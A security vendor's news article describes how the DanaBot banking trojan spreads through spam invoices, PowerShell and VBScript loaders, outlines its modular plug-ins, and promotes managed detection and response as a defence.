Hybrid Cloud Security
Data Center & Virtualization
Security Fit for DevOps
Solutions for Security Teams
Advanced Threat Protection
Endpoint & Gateway Suites
SaaS Application Security
Endpoint Detection & Response
Point of Sale
All Products and Trials
Centralized Visibility & Investigation
Global Threat Intelligence
Connected Threat Defense
Breaking News & Intelligence
Simply Security Blog
Security Intelligence Blog
UK Security Blog
Education & Certification
Glossary of Terms
Research & Reports
The Deep Web
Internet of Things (IoT)
Zero Day Initiative (ZDI)
Login to Support
Virus & Threat Help
Renewals & Registration
Free Cleanup Tools
Find a Support Partner
Pre-Sales Technical Advice
For popular products:
Find a Partner (Reseller, CSP, MSP)
Become a Partner (Reseller, Integrator)
All Alliance Partners
Customer Success Stories
Corporate Social Responsibility
Diversity & Inclusion
Internet Safety and Cybersecurity Education
Find a Partner
1-877-218-7353(M-F 8-5 CST)
Learn of upcoming events
Social Media Networks
+44 (0) 203 549 3300
Security researchers from ESET recently discovered a banking trojan named DanaBot (detected by Trend Micro as TROJ_BANLOAD.THFOAAH) being distributed to European countries via spam emails. Here’s what you need to know about this threat, how users and businesses can defend against it, and how managed detection and response can help address this threat.
DanaBot is a banking trojan, written in Delphi programming language, capable of stealing credentials and hijacking infected systems. It is distributed via spam emails masquerading as invoices with malicious attachment that, when executed, abuses PowerShell — a legitimate system administration tool — and Visual Basic scripts (VBScript) called BrushaLoader to retrieve and execute its modules.
When it was first discovered, DanaBot used Word documents embedded with malicious macro that, once enabled, downloads DanaBot via PowerShell. Security researchers noted that the use of BrushaLoader in recent spam campaigns was a recent addition, and that DanaBot itself underwent updates.
[RELATED NEWS: Evolving Trickbot adds detection evasion and screen-locking features]
DanaBot was first seen being distributed to Australian users via spam with a malicious Word document that claims the user is “protected” by a security company. DanaBot’s command-and-control (C&C) server first checks the affected system’s IP address, and delivers the banking trojan if it is located in Australia.
DanaBot’s operators have since expanded their targets. The recent spam campaigns are now being distributed to European countries, particularly Austria, Germany, Italy, Poland, and Ukraine. While the missives still pose as invoices, PowerShell and BrushaLoader are used to download DanaBot’s various components.
[Trend Micro 2018 Midyear Security Roundup: Fileless, macro and small-sized malware challenges purely file-based security technologies]
DanaBot is notable for its multistage infection chain and modular architecture. Prior research from Trustwave, along with ESET's new research, identifies DanaBot as comprising several components — mostly as dynamic-link libraries (DLL) — that perform separate functions. The identified plug-ins steal credentials from various applications, functions as RDP (Remote Desktop Protocol) to other Windows-based computers, injects scripts to browsers, among others.
[Best Practices: InfoSec Guide: Web Injections]
While modular malware isn’t new, it can pose significant risks given its stealthy nature. In fact, this technique is increasingly used by botnets, other information and file stealers, Android malware, point-of-sale (PoS) malware, and even cyberespionage campaigns. Modular malware can be difficult to detect. For instance, a module can be programmed to terminate or not work without running another, so a malware component can dwell within an affected system for a long time until it is executed. Attackers can also program a module to self-execute and not rely on other components. In this case, a malware can execute information theft while letting its other components that have other functionalities remain hidden. Uncovering a component doesn’t guarantee others can be found either.
Defending against modular malware like DanaBot requires a multilayered approach. Here are some best practices:
[READ: Data Breaches Highlight the Need for Managed Detection and Response]
Ideally, businesses should have the necessary security mechanisms in place to defend against stealthy threats, but enterprises may find it arduous given budget constraints (like in hiring or retaining security specialists) or the worsening cybersecurity skills gap. A security strategy that enterprises can consider is using managed detection and response (MDR), which provides comprehensive threat hunting services and access to security specialists that can help enterprises investigate, proactively respond to, and remediate from evasive threats.
For example, detecting or blocking a modular malware’s component doesn’t ensure that its other plug-ins can be found. In a modular PoS malware like FastPOS, for instance, its random access memory-scraping module (RAM) can run as a service separately, and may be easier to remove. However, it may be difficult to detect its keylogging module if it injects its code into a legitimate process. It takes a proactive approach to identify where malware could be dwelling and correlate its activity — if it’s downloading additional payloads or has infected other processes, for instance. MDR provides the technology and especially the expertise needed to develop a proactive incident response and remediation strategy that can mitigate threats and cyberattacks.
Trend Micro’s managed detection and response service allows customers to investigate security alerts without the need to hire qualified incident response staff. It provides alert monitoring, alert prioritization, investigation, and threat hunting services to Trend Micro customers. By applying artificial intelligence models to customer endpoint data, network data, and server information, the service can correlate and prioritize advanced threats. Trend Micro threat researchers can investigate prioritized alerts to determine the extent and spread of the attack and work with the customer to provide a detailed remediation plan.
Like it? Add this infographic to your site:1. Click on the box below. 2. Press Ctrl+A to select all. 3. Press Ctrl+C to copy. 4. Paste the code into your page (Ctrl+V).
Image will appear the same size as you see above.